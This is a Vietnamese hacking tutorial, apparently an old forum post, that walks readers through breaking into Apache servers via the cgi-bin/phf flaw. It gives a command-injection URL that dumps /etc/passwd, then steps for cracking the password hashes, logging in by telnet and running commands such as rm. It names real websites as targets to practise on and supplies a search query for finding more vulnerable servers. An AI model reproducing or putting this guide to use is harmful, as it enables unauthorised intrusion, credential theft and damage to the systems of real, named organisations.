• Các bạn thường hỏi : Làm thế nào các Hacker , hack được một website ??
• Tôi sẽ trình bày với các bạn cách hack một website trên Apache server mà không dùng đến các tool hack, ta chỉ dùng đến Browser thôi !

Hack Apache server :

• Các website trên NET hiện nay thường dùng Apache server vì có độ bảo mật cao. Vì vậy bug duy nhất được tìm thấy từ năm 97 là lỗi "cgi-bin/phf query". Hiện nay thì lỗi này đã được patch rồi nhưng vẫn có server chưa sửa lỗi, đó là cơ hội để thực tập
• Bắt đầu tiến hành :
  1. Xác đinh website có dùng apache hay không : có nhiều cách để xác đinh bằng cách dùng các tool hacker , nhưng ở đây chúng ta chỉ cần dùng browser là đủ, bạn đánh như sau ở browser :

     http://www.diachitrangweb.com/cgi-bin/

     Nếu một thông báo lỗi như sau hiện ra, thì đó đúng là apache server :

     Apache/xx.xx.xx at diachitrangweb Port 80 (xx.xx.xx là version của apache)

  2. Xác đinh xem server có bị lỗi phf không : ở URL bạn đánh như sau http://www.diachitrangweb.com/cgi-bin/phf nếu bạn không bi quay vể trang chủ thì bạn có 60% cơ hội dể hack website đó
  3. Tiếp tục bạn đánh ở URL đoạn mã lênh sau :

     http://www.diachitrangweb.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

     lúc đó bạn sẽ có đươc nội dung của file chứa password của server *pwd . Dĩ nhiên là nó đã bi encrypt vì vạy phải save nó vào.

  4. OK, sau khi đã có file password dưới dạng *.pwd bạn cần công cụ password tool để decrypt nó, hay dùng nhất là Jackpot (Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper), nhưng theo tôi thì dùng Hacker Utilities thì tốt hơn và nhanh hơn (Download chúng ở mục hacktool). Một file *.pwd encrypt có dạng như sau :

     root:Npge08pfz4wuk:0:1:Super-User:/:/sbin/bash
     daemon:Fs2e08p34Cxw1:1:1::/:
     bin:Npge08pfz4wuk:2:2::/usr/bin:

  5. Sau khi đã decrypt password bạn sẽ có user và password để vào server bằng Telnet. ở cửa sổ Run của Windows bạn đánh : telnet . Rồi chọn

     Host: diachitrangweb.com | Port: telnet | Term type: vt100

     Ðánh user và pass bạn có được để login vào server này

  6. Thực hiện một số lệnh Unix để exploit server :

     HELP = HELP
     COPY = CP
     MOVE = MV
     DIR = LS
     DEL = RM
     CD = CD .....................

     Và bạn muốn làm gì thì đó là tuỳ vào ý thích của bạn (Xem thêm sách telnet ..:) )

  7. Giới thiệu mọtt só website để bạn thưc tập : http://www.slu.edu/ http://www.spawn.com/ http://www.garply.com/
  8. Bonus track : Vấn đề khó khăn cho các bạn là làm thế nào để tìm được website để hack , đay là một thủ thuât dơn giản : ban vào trang http://www.av.com/ rồi search với thuât ngữ sau : cgi-bin AND perl.exe OR cgi-bin AND phf

     Lúc đó sẽ có vô số trang web cho bạn hack mệt nghỉ :))